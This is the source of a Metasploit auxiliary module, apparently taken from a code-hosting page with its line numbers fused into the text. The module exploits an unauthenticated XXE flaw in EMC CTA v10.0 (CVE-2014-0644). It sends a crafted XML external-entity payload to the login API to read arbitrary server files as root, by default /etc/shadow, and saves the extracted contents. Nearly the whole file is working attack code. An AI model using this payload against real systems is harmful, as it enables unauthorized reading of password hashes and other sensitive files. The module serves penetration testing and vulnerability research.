Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',13'Description' => %q{14EMC CTA v10.0 is susceptible to an unauthenticated XXE attack15that allows an attacker to read arbitrary files from the file system16with the permissions of the root user.17},18'License' => MSF_LICENSE,19'Author' => [20'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module21],22'References' => [23['CVE', '2014-0644'],24['EDB', '32623']25],26'DisclosureDate' => '2014-03-31',27'Notes' => {28'Reliability' => UNKNOWN_RELIABILITY,29'Stability' => UNKNOWN_STABILITY,30'SideEffects' => UNKNOWN_SIDE_EFFECTS31}32)33)3435register_options(36[37Opt::RPORT(443),38OptBool.new('SSL', [true, 'Use SSL', true]),39OptString.new('TARGETURI', [ true, "Base directory path", '/']),40OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),41]42)43end4445def run46doctype = Rex::Text.rand_text_alpha(6)47element = Rex::Text.rand_text_alpha(6)48entity = Rex::Text.rand_text_alpha(6)4950pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>51<!DOCTYPE #{doctype} [52<!ELEMENT #{element} ANY >53<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>54<Request>55<Username>root</Username>56<Password>&#{entity};</Password>57</Request>58}5960res = send_request_cgi({61'uri' => normalize_uri(target_uri.path, 'api', 'login'),62'method' => 'POST',63'data' => pay64})6566if !res or !res.body67fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")68end6970file = /For input string: "(.*)"/m.match(res.body)7172if !file or file.length < 273fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")74end7576file = file[1]7778path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])7980print_good("File saved to: " + path)81end82end838485